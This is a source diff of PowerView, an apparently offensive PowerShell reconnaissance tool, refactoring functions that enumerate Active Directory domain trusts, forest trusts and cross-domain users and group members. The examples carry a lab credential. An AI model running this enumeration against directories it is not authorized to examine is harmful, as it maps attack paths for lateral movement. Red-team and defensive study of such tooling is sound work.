"prod.testlab.local" -DomainController "PRIMARY.testlab.local" +.PARAMETER Credential - Return domain trusts for the "prod.testlab.local" domain enumerated through LDAP - queries, reflecting queries through the "Primary.testlab.local" domain controller, - using .NET methods. +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. - .EXAMPLE +.EXAMPLE - PS C:\> Get-NetDomainTrust -API -Domain "prod.testlab.local" +Get-DomainTrust - Return domain trusts for the "prod.testlab.local" domain enumerated through API calls. +Return domain trusts for the current domain using built in .LDAP methods. - .EXAMPLE +.EXAMPLE - PS C:\> Get-NetDomainTrust -API -DomainController WINDOWS2.testlab.local +Get-DomainTrust -NET -Domain "prod.testlab.local" - Return domain trusts reachable from the WINDOWS2 machine through API calls. +Return domain trusts for the "prod.testlab.local" domain using .NET methods + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainTrust -Domain "prod.testlab.local" -Server "PRIMARY.testlab.local" -Credential $Cred + +Return domain trusts for the "prod.testlab.local" domain enumerated through LDAP +queries, binding to the PRIMARY.testlab.local server for queries, and using the specified +alternate credenitals. + +.EXAMPLE + +Get-DomainTrust -API -Domain "prod.testlab.local" + +Return domain trusts for the "prod.testlab.local" domain enumerated through API calls. + +.OUTPUTS + +PowerView.DomainTrust.LDAP + +Custom PSObject with translated domain LDAP trust result fields (default). + +PowerView.DomainTrust.NET + +A TrustRelationshipInformationCollection returned when using .NET methods. + +PowerView.DomainTrust.API + +Custom PSObject with translated domain API trust result fields. #> - [CmdletBinding()] - param( - [Parameter(Position=0, ValueFromPipeline=$True)] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.DomainTrust.NET')] + [OutputType('PowerView.DomainTrust.LDAP')] + [OutputType('PowerView.DomainTrust.API')] + [CmdletBinding(DefaultParameterSetName = 'LDAP')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [ValidateNotNullOrEmpty()] [String] $Domain, + [Parameter(ParameterSetName = 'API')] + [Switch] + $API, + + [Parameter(ParameterSetName = 'NET')] + [Switch] + $NET, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateNotNullOrEmpty()] + [Alias('Filter')] [String] - $DomainController, + $LDAPFilter, + [Parameter(ParameterSetName = 'LDAP')] + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] [String] - $ADSpath, + $SearchBase, - [Switch] - $API, + [Parameter(ParameterSetName = 'LDAP')] + [Parameter(ParameterSetName = 'API')] + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, - [Switch] - $LDAP, + [Parameter(ParameterSetName = 'LDAP')] + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', - [ValidateRange(1,10000)] + [Parameter(ParameterSetName = 'LDAP')] + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [Parameter(ParameterSetName = 'LDAP')] + [ValidateRange(1, 10000)] [Int] - $PageSize = 200, + $ServerTimeLimit, + [Parameter(ParameterSetName = 'LDAP')] + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Parameter(ParameterSetName = 'LDAP')] [Management.Automation.PSCredential] - $Credential + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty ) - begin { + BEGIN { $TrustAttributes = @{ - [uint32]'0x00000001' = 'non_transitive' - [uint32]'0x00000002' = 'uplevel_only' - [uint32]'0x00000004' = 'quarantined_domain' - [uint32]'0x00000008' = 'forest_transitive' - [uint32]'0x00000010' = 'cross_organization' - [uint32]'0x00000020' = 'within_forest' - [uint32]'0x00000040' = 'treat_as_external' - [uint32]'0x00000080' = 'trust_uses_rc4_encryption' - [uint32]'0x00000100' = 'trust_uses_aes_keys' - [uint32]'0x00000200' = 'cross_organization_no_tgt_delegation' - [uint32]'0x00000400' = 'pim_trust' - } + [uint32]'0x00000001' = 'NON_TRANSITIVE' + [uint32]'0x00000002' = 'UPLEVEL_ONLY' + [uint32]'0x00000004' = 'FILTER_SIDS' + [uint32]'0x00000008' = 'FOREST_TRANSITIVE' + [uint32]'0x00000010' = 'CROSS_ORGANIZATION' + [uint32]'0x00000020' = 'WITHIN_FOREST' + [uint32]'0x00000040' = 'TREAT_AS_EXTERNAL' + [uint32]'0x00000080' = 'TRUST_USES_RC4_ENCRYPTION' + [uint32]'0x00000100' = 'TRUST_USES_AES_KEYS' + [uint32]'0x00000200' = 'CROSS_ORGANIZATION_NO_TGT_DELEGATION' + [uint32]'0x00000400' = 'PIM_TRUST' + } + + $LdapSearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $LdapSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $LdapSearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['Properties']) { $LdapSearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $LdapSearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $LdapSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $LdapSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $LdapSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $LdapSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $LdapSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $LdapSearcherArguments['Credential'] = $Credential } } - process { - - if(-not $Domain) { - # if not domain is specified grab the current domain - $SourceDomain = (Get-NetDomain -Credential $Credential).Name + PROCESS { + if ($PsCmdlet.ParameterSetName -ne 'API') { + $NetSearcherArguments = @{} + if ($Domain -and $Domain.Trim() -ne '') { + $SourceDomain = $Domain + } + else { + if ($PSBoundParameters['Credential']) { + $SourceDomain = (Get-Domain -Credential $Credential).Name + } + else { + $SourceDomain = (Get-Domain).Name + } + } } - else { - $SourceDomain = $Domain + elseif ($PsCmdlet.ParameterSetName -ne 'NET') { + if ($Domain -and $Domain.Trim() -ne '') { + $SourceDomain = $Domain + } + else { + $SourceDomain = $Env:USERDNSDOMAIN + } } - if($LDAP -or $ADSPath) { - - $TrustSearcher = Get-DomainSearcher -Domain $SourceDomain -DomainController $DomainController -Credential $Credential -PageSize $PageSize -ADSpath $ADSpath + if ($PsCmdlet.ParameterSetName -eq 'LDAP') { + # if we're searching for domain trusts through LDAP/ADSI + $TrustSearcher = Get-DomainSearcher @LdapSearcherArguments + $SourceSID = Get-DomainSID @NetSearcherArguments - $SourceSID = Get-DomainSID -Domain $SourceDomain -DomainController $DomainController - - if($TrustSearcher) { + if ($TrustSearcher) { $TrustSearcher.Filter = '(objectClass=trustedDomain)' - $Results = $TrustSearcher.FindAll() + if ($PSBoundParameters['FindOne']) { $Results = $TrustSearcher.FindOne() } + else { $Results = $TrustSearcher.FindAll() } $Results | Where-Object {$_} | ForEach-Object { $Props = $_.Properties $DomainTrust = New-Object PSObject - + $TrustAttrib = @() $TrustAttrib += $TrustAttributes.Keys | Where-Object { $Props.trustattributes[0] -band $_ } | ForEach-Object { $TrustAttributes[$_] } @@ -12657,95 +19702,128 @@ function Get-NetDomainTrust { 2 { 'Outbound' } 3 { 'Bidirectional' } } + + $TrustType = Switch ($Props.trusttype) { + 1 { 'WINDOWS_NON_ACTIVE_DIRECTORY' } + 2 { 'WINDOWS_ACTIVE_DIRECTORY' } + 3 { 'MIT' } + } + + $Distinguishedname = $Props.distinguishedname[0] + $SourceNameIndex = $Distinguishedname.IndexOf('DC=') + if ($SourceNameIndex) { + $SourceDomain = $($Distinguishedname.SubString($SourceNameIndex)) -replace 'DC=','' -replace ',','.' + } + else { + $SourceDomain = "" + } + + $TargetNameIndex = $Distinguishedname.IndexOf(',CN=System') + if ($SourceNameIndex) { + $TargetDomain = $Distinguishedname.SubString(3, $TargetNameIndex-3) + } + else { + $TargetDomain = "" + } + $ObjectGuid = New-Object Guid @(,$Props.objectguid[0]) $TargetSID = (New-Object System.Security.Principal.SecurityIdentifier($Props.securityidentifier[0],0)).Value + $DomainTrust | Add-Member Noteproperty 'SourceName' $SourceDomain - $DomainTrust | Add-Member Noteproperty 'SourceSID' $SourceSID $DomainTrust | Add-Member Noteproperty 'TargetName' $Props.name[0] - $DomainTrust | Add-Member Noteproperty 'TargetSID' $TargetSID - $DomainTrust | Add-Member Noteproperty 'ObjectGuid' "{$ObjectGuid}" - $DomainTrust | Add-Member Noteproperty 'TrustType' $($TrustAttrib -join ',') + # $DomainTrust | Add-Member Noteproperty 'TargetGuid' "{$ObjectGuid}" + $DomainTrust | Add-Member Noteproperty 'TrustType' $TrustType + $DomainTrust | Add-Member Noteproperty 'TrustAttributes' $($TrustAttrib -join ',') $DomainTrust | Add-Member Noteproperty 'TrustDirection' "$Direction" - $DomainTrust.PSObject.TypeNames.Add('PowerView.DomainTrustLDAP') + $DomainTrust | Add-Member Noteproperty 'WhenCreated' $Props.whencreated[0] + $DomainTrust | Add-Member Noteproperty 'WhenChanged' $Props.whenchanged[0] + $DomainTrust.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.LDAP') $DomainTrust } - $Results.dispose() + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainTrust] Error disposing of the Results object: $_" + } + } $TrustSearcher.dispose() } } - elseif($API) { - if(-not $DomainController) { - $DomainController = Get-NetDomainController -Credential $Credential -Domain $SourceDomain | Select-Object -First 1 | Select-Object -ExpandProperty Name + elseif ($PsCmdlet.ParameterSetName -eq 'API') { + # if we're searching for domain trusts through Win32 API functions + if ($PSBoundParameters['Server']) { + $TargetDC = $Server + } + elseif ($Domain -and $Domain.Trim() -ne '') { + $TargetDC = $Domain + } + else { + # see https://msdn.microsoft.com/en-us/library/ms675976(v=vs.85).aspx for default NULL behavior + $TargetDC = $Null } - if($DomainController) { - # arguments for DsEnumerateDomainTrusts - $PtrInfo = [IntPtr]::Zero + # arguments for DsEnumerateDomainTrusts + $PtrInfo = [IntPtr]::Zero - # 63 = DS_DOMAIN_IN_FOREST + DS_DOMAIN_DIRECT_OUTBOUND + DS_DOMAIN_TREE_ROOT + DS_DOMAIN_PRIMARY + DS_DOMAIN_NATIVE_MODE + DS_DOMAIN_DIRECT_INBOUND - $Flags = 63 - $DomainCount = 0 + # 63 = DS_DOMAIN_IN_FOREST + DS_DOMAIN_DIRECT_OUTBOUND + DS_DOMAIN_TREE_ROOT + DS_DOMAIN_PRIMARY + DS_DOMAIN_NATIVE_MODE + DS_DOMAIN_DIRECT_INBOUND + $Flags = 63 + $DomainCount = 0 - # get the trust information from the target server - $Result = $Netapi32::DsEnumerateDomainTrusts($DomainController, $Flags, [ref]$PtrInfo, [ref]$DomainCount) + # get the trust information from the target server + $Result = $Netapi32::DsEnumerateDomainTrusts($TargetDC, $Flags, [ref]$PtrInfo, [ref]$DomainCount) - # Locate the offset of the initial intPtr - $Offset = $PtrInfo.ToInt64() + # Locate the offset of the initial intPtr + $Offset = $PtrInfo.ToInt64() - # 0 = success - if (($Result -eq 0) -and ($Offset -gt 0)) { + # 0 = success + if (($Result -eq 0) -and ($Offset -gt 0)) { - # Work out how much to increment the pointer by finding out the size of the structure - $Increment = $DS_DOMAIN_TRUSTS::GetSize() + # Work out how much to increment the pointer by finding out the size of the structure + $Increment = $DS_DOMAIN_TRUSTS::GetSize() - # parse all the result structures - for ($i = 0; ($i -lt $DomainCount); $i++) { - # create a new int ptr at the given offset and cast the pointer as our result structure - $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset - $Info = $NewIntPtr -as $DS_DOMAIN_TRUSTS + # parse all the result structures + for ($i = 0; ($i -lt $DomainCount); $i++) { + # create a new int ptr at the given offset and cast the pointer as our result structure + $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset + $Info = $NewIntPtr -as $DS_DOMAIN_TRUSTS - $Offset = $NewIntPtr.ToInt64() - $Offset += $Increment + $Offset = $NewIntPtr.ToInt64() + $Offset += $Increment - $SidString = "" - $Result = $Advapi32::ConvertSidToStringSid($Info.DomainSid, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() + $SidString = '' + $Result = $Advapi32::ConvertSidToStringSid($Info.DomainSid, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() - if($Result -eq 0) { - Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)" - } - else { - $DomainTrust = New-Object PSObject - $DomainTrust | Add-Member Noteproperty 'SourceDomain' $SourceDomain - $DomainTrust | Add-Member Noteproperty 'SourceDomainController' $DomainController - $DomainTrust | Add-Member Noteproperty 'NetbiosDomainName' $Info.NetbiosDomainName - $DomainTrust | Add-Member Noteproperty 'DnsDomainName' $Info.DnsDomainName - $DomainTrust | Add-Member Noteproperty 'Flags' $Info.Flags - $DomainTrust | Add-Member Noteproperty 'ParentIndex' $Info.ParentIndex - $DomainTrust | Add-Member Noteproperty 'TrustType' $Info.TrustType - $DomainTrust | Add-Member Noteproperty 'TrustAttributes' $Info.TrustAttributes - $DomainTrust | Add-Member Noteproperty 'DomainSid' $SidString - $DomainTrust | Add-Member Noteproperty 'DomainGuid' $Info.DomainGuid - $DomainTrust.PSObject.TypeNames.Add('PowerView.APIDomainTrust') - $DomainTrust - } + if ($Result -eq 0) { + Write-Verbose "[Get-DomainTrust] Error: $(([ComponentModel.Win32Exception] $LastError).Message)" + } + else { + $DomainTrust = New-Object PSObject + $DomainTrust | Add-Member Noteproperty 'SourceName' $SourceDomain + $DomainTrust | Add-Member Noteproperty 'TargetName' $Info.DnsDomainName + $DomainTrust | Add-Member Noteproperty 'TargetNetbiosName' $Info.NetbiosDomainName + $DomainTrust | Add-Member Noteproperty 'Flags' $Info.Flags + $DomainTrust | Add-Member Noteproperty 'ParentIndex' $Info.ParentIndex + $DomainTrust | Add-Member Noteproperty 'TrustType' $Info.TrustType + $DomainTrust | Add-Member Noteproperty 'TrustAttributes' $Info.TrustAttributes + $DomainTrust | Add-Member Noteproperty 'TargetSid' $SidString + $DomainTrust | Add-Member Noteproperty 'TargetGuid' $Info.DomainGuid + $DomainTrust.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.API') + $DomainTrust } - # free up the result buffer - $Null = $Netapi32::NetApiBufferFree($PtrInfo) - } - else { - Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)" } + # free up the result buffer + $Null = $Netapi32::NetApiBufferFree($PtrInfo) } else { - Write-Verbose "Could not retrieve domain controller for $Domain" + Write-Verbose "[Get-DomainTrust] Error: $(([ComponentModel.Win32Exception] $Result).Message)" } } else { - # if we're using direct domain connections through .NET - $FoundDomain = Get-NetDomain -Domain $Domain -Credential $Credential - if($FoundDomain) { + # if we're searching for domain trusts through .NET methods + $FoundDomain = Get-Domain @NetSearcherArguments + if ($FoundDomain) { $FoundDomain.GetAllTrustRelationships() | ForEach-Object { - $_.PSObject.TypeNames.Add('PowerView.DomainTrust') + $_.PSObject.TypeNames.Insert(0, 'PowerView.DomainTrust.NET') $_ } } @@ -12754,442 +19832,653 @@ function Get-NetDomainTrust { } -function Get-NetForestTrust { -<# - .SYNOPSIS +function Get-ForestTrust { +<# +.SYNOPSIS + +Return all forest trusts for the current forest or a specified forest. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Forest + +.DESCRIPTION + +This function will enumerate domain trust relationships for the current (or a remote) +forest using number of method using the .NET method GetAllTrustRelationships() on a +System.DirectoryServices.ActiveDirectory.Forest returned by Get-Forest. + +.PARAMETER Forest + +Specifies the forest to query for trusts, defaults to the current forest. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-ForestTrust + +Return current forest trusts. + +.EXAMPLE + +Get-ForestTrust -Forest "external.local" + +Return trusts for the "external.local" forest. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-ForestTrust -Forest "external.local" -Credential $Cred + +Return trusts for the "external.local" forest using the specified alternate credenitals. + +.OUTPUTS + +PowerView.DomainTrust.NET + +A TrustRelationshipInformationCollection returned when using .NET methods (default). +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.ForestTrust.NET')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [ValidateNotNullOrEmpty()] + [String] + $Forest, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + $NetForestArguments = @{} + if ($PSBoundParameters['Forest']) { $NetForestArguments['Forest'] = $Forest } + if ($PSBoundParameters['Credential']) { $NetForestArguments['Credential'] = $Credential } + + $FoundForest = Get-Forest @NetForestArguments + + if ($FoundForest) { + $FoundForest.GetAllTrustRelationships() | ForEach-Object { + $_.PSObject.TypeNames.Insert(0, 'PowerView.ForestTrust.NET') + $_ + } + } + } +} + + +function Get-DomainForeignUser { +<# +.SYNOPSIS + +Enumerates users who are in groups outside of the user's domain. +This is a domain's "outgoing" access. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainUser - Return all trusts for the current forest. +.DESCRIPTION - .PARAMETER Forest +Uses Get-DomainUser to enumerate all users for the current (or target) domain, +then calculates the given user's domain name based on the user's distinguishedName. +This domain name is compared to the queried domain, and the user object is +output if they differ. - Return trusts for the specified forest. +.PARAMETER Domain - .PARAMETER Credential +Specifies the domain to use for the query, defaults to the current domain. - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +.PARAMETER LDAPFilter - .EXAMPLE +Specifies an LDAP query string that is used to filter Active Directory objects. - PS C:\> Get-NetForestTrust +.PARAMETER Properties - Return current forest trusts. +Specifies the properties of the output object to retrieve from the server. - .EXAMPLE +.PARAMETER SearchBase - PS C:\> Get-NetForestTrust -Forest "test" +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. - Return trusts for the "test" forest. -#> +.PARAMETER Server - [CmdletBinding()] - param( - [Parameter(Position=0,ValueFromPipeline=$True)] - [String] - $Forest, +Specifies an Active Directory server (domain controller) to bind to. - [Management.Automation.PSCredential] - $Credential - ) +.PARAMETER SearchScope - process { - $FoundForest = Get-NetForest -Forest $Forest -Credential $Credential +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). - if($FoundForest) { - $FoundForest.GetAllTrustRelationships() | ForEach-Object { - $_.PSObject.TypeNames.Add('PowerView.ForestTrust') - $_ - } - } - } -} +.PARAMETER ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. -function Find-ForeignUser { -<# - .SYNOPSIS +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - Enumerates users who are in groups outside of their - principal domain. The -Recurse option will try to map all - transitive domain trust relationships and enumerate all - users who are in groups outside of their principal domain. +.PARAMETER SecurityMasks - .PARAMETER UserName +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. - Username to filter results for, wildcards accepted. +.PARAMETER Tombstone - .PARAMETER Domain +Switch. Specifies that the searcher should also return deleted/tombstoned objects. - Domain to query for users, defaults to the current domain. +.PARAMETER Credential - .PARAMETER DomainController +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. - Domain controller to reflect LDAP queries through. +.EXAMPLE - .PARAMETER LDAP +Get-DomainForeignUser - Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections. - More likely to get around network segmentation, but not as accurate. +Return all users in the current domain who are in groups not in the +current domain. - .PARAMETER Recurse +.EXAMPLE - Switch. Enumerate all user trust groups from all reachable domains recursively. +Get-DomainForeignUser -Domain dev.testlab.local - .PARAMETER PageSize +Return all users in the dev.testlab.local domain who are in groups not in the +dev.testlab.local domain. - The PageSize to set for the LDAP searcher object. +.EXAMPLE - .LINK +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainForeignUser -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred - http://blog.harmj0y.net/ +Return all users in the dev.testlab.local domain who are in groups not in the +dev.testlab.local domain, binding to the secondary.dev.testlab.local for queries, and +using the specified alternate credentials. + +.OUTPUTS + +PowerView.ForeignUser + +Custom PSObject with translated user property fields. #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.ForeignUser')] [CmdletBinding()] - param( + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [ValidateNotNullOrEmpty()] [String] - $UserName, + $Domain, + [ValidateNotNullOrEmpty()] + [Alias('Filter')] [String] - $Domain, + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] [String] - $DomainController, + $SearchBase, - [Switch] - $LDAP, + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, - [Switch] - $Recurse, + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', - [ValidateRange(1,10000)] + [ValidateRange(1, 10000)] [Int] - $PageSize = 200 - ) + $ResultPageSize = 200, - function Get-ForeignUser { - # helper used to enumerate users who are in groups outside of their principal domain - param( - [String] - $UserName, + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, - [String] - $Domain, + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, - [String] - $DomainController, + [Switch] + $Tombstone, - [ValidateRange(1,10000)] - [Int] - $PageSize = 200 - ) + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) - if ($Domain) { - # get the domain name into distinguished form - $DistinguishedDomainName = "DC=" + $Domain -replace '\.',',DC=' - } - else { - $DistinguishedDomainName = [String] ([adsi]'').distinguishedname - $Domain = $DistinguishedDomainName -replace 'DC=','' -replace ',','.' - } + BEGIN { + $SearcherArguments = @{} + $SearcherArguments['LDAPFilter'] = '(memberof=*)' + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + if ($PSBoundParameters['Raw']) { $SearcherArguments['Raw'] = $Raw } + } - Get-NetUser -Domain $Domain -DomainController $DomainController -UserName $UserName -PageSize $PageSize -Filter '(memberof=*)' | ForEach-Object { + PROCESS { + Get-DomainUser @SearcherArguments | ForEach-Object { ForEach ($Membership in $_.memberof) { - $Index = $Membership.IndexOf("DC=") - if($Index) { - - $GroupDomain = $($Membership.substring($Index)) -replace 'DC=','' -replace ',','.' - - if ($GroupDomain.CompareTo($Domain)) { - # if the group domain doesn't match the user domain, output - $GroupName = $Membership.split(",")[0].split("=")[1] + $Index = $Membership.IndexOf('DC=') + if ($Index) { + + $GroupDomain = $($Membership.SubString($Index)) -replace 'DC=','' -replace ',','.' + $UserDistinguishedName = $_.distinguishedname + $UserIndex = $UserDistinguishedName.IndexOf('DC=') + $UserDomain = $($_.distinguishedname.SubString($UserIndex)) -replace 'DC=','' -replace ',','.' + + if ($GroupDomain -ne $UserDomain) { + # if the group domain doesn't match the user domain, display it + $GroupName = $Membership.Split(',')[0].split('=')[1] $ForeignUser = New-Object PSObject - $ForeignUser | Add-Member Noteproperty 'UserDomain' $Domain + $ForeignUser | Add-Member Noteproperty 'UserDomain' $UserDomain $ForeignUser | Add-Member Noteproperty 'UserName' $_.samaccountname + $ForeignUser | Add-Member Noteproperty 'UserDistinguishedName' $_.distinguishedname $ForeignUser | Add-Member Noteproperty 'GroupDomain' $GroupDomain $ForeignUser | Add-Member Noteproperty 'GroupName' $GroupName - $ForeignUser | Add-Member Noteproperty 'GroupDN' $Membership + $ForeignUser | Add-Member Noteproperty 'GroupDistinguishedName' $Membership + $ForeignUser.PSObject.TypeNames.Insert(0, 'PowerView.ForeignUser') $ForeignUser } } } } } - - if ($Recurse) { - # get all rechable domains in the trust mesh and uniquify them - if($LDAP -or $DomainController) { - $DomainTrusts = Invoke-MapDomainTrust -LDAP -DomainController $DomainController -PageSize $PageSize | ForEach-Object { $_.SourceDomain } | Sort-Object -Unique - } - else { - $DomainTrusts = Invoke-MapDomainTrust -PageSize $PageSize | ForEach-Object { $_.SourceDomain } | Sort-Object -Unique - } - - ForEach($DomainTrust in $DomainTrusts) { - # get the trust groups for each domain in the trust mesh - Write-Verbose "Enumerating trust groups in domain $DomainTrust" - Get-ForeignUser -Domain $DomainTrust -UserName $UserName -PageSize $PageSize - } - } - else { - Get-ForeignUser -Domain $Domain -DomainController $DomainController -UserName $UserName -PageSize $PageSize - } } -function Find-ForeignGroup { +function Get-DomainForeignGroupMember { <# - .SYNOPSIS +.SYNOPSIS + +Enumerates groups with users outside of the group's domain and returns +each foreign member. This is a domain's "incoming" access. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainGroup + +.DESCRIPTION + +Uses Get-DomainGroup to enumerate all groups for the current (or target) domain, +then enumerates the members of each group, and compares the member's domain +name to the parent group's domain name, outputting the member if the domains differ. - Enumerates all the members of a given domain's groups - and finds users that are not in the queried domain. - The -Recurse flag will perform this enumeration for all - eachable domain trusts. +.PARAMETER Domain - .PARAMETER GroupName +Specifies the domain to use for the query, defaults to the current domain. - Groupname to filter results for, wildcards accepted. +.PARAMETER LDAPFilter - .PARAMETER Domain +Specifies an LDAP query string that is used to filter Active Directory objects. - Domain to query for groups, defaults to the current domain. +.PARAMETER Properties - .PARAMETER DomainController +Specifies the properties of the output object to retrieve from the server. - Domain controller to reflect LDAP queries through. +.PARAMETER SearchBase - .PARAMETER LDAP +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. - Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections. - More likely to get around network segmentation, but not as accurate. +.PARAMETER Server - .PARAMETER Recurse +Specifies an Active Directory server (domain controller) to bind to. - Switch. Enumerate all group trust users from all reachable domains recursively. +.PARAMETER SearchScope - .PARAMETER PageSize +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). - The PageSize to set for the LDAP searcher object. +.PARAMETER ResultPageSize - .LINK +Specifies the PageSize to set for the LDAP searcher object. - http://blog.harmj0y.net/ +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainForeignGroupMember + +Return all group members in the current domain where the group and member differ. + +.EXAMPLE + +Get-DomainForeignGroupMember -Domain dev.testlab.local + +Return all group members in the dev.testlab.local domain where the member is not in dev.testlab.local. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainForeignGroupMember -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred + +Return all group members in the dev.testlab.local domain where the member is +not in dev.testlab.local. binding to the secondary.dev.testlab.local for +queries, and using the specified alternate credentials. + +.OUTPUTS + +PowerView.ForeignGroupMember + +Custom PSObject with translated group member property fields. #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.ForeignGroupMember')] [CmdletBinding()] - param( + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [ValidateNotNullOrEmpty()] [String] - $GroupName = '*', + $Domain, + [ValidateNotNullOrEmpty()] + [Alias('Filter')] [String] - $Domain, + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] [String] - $DomainController, + $SearchBase, - [Switch] - $LDAP, + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, - [Switch] - $Recurse, + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 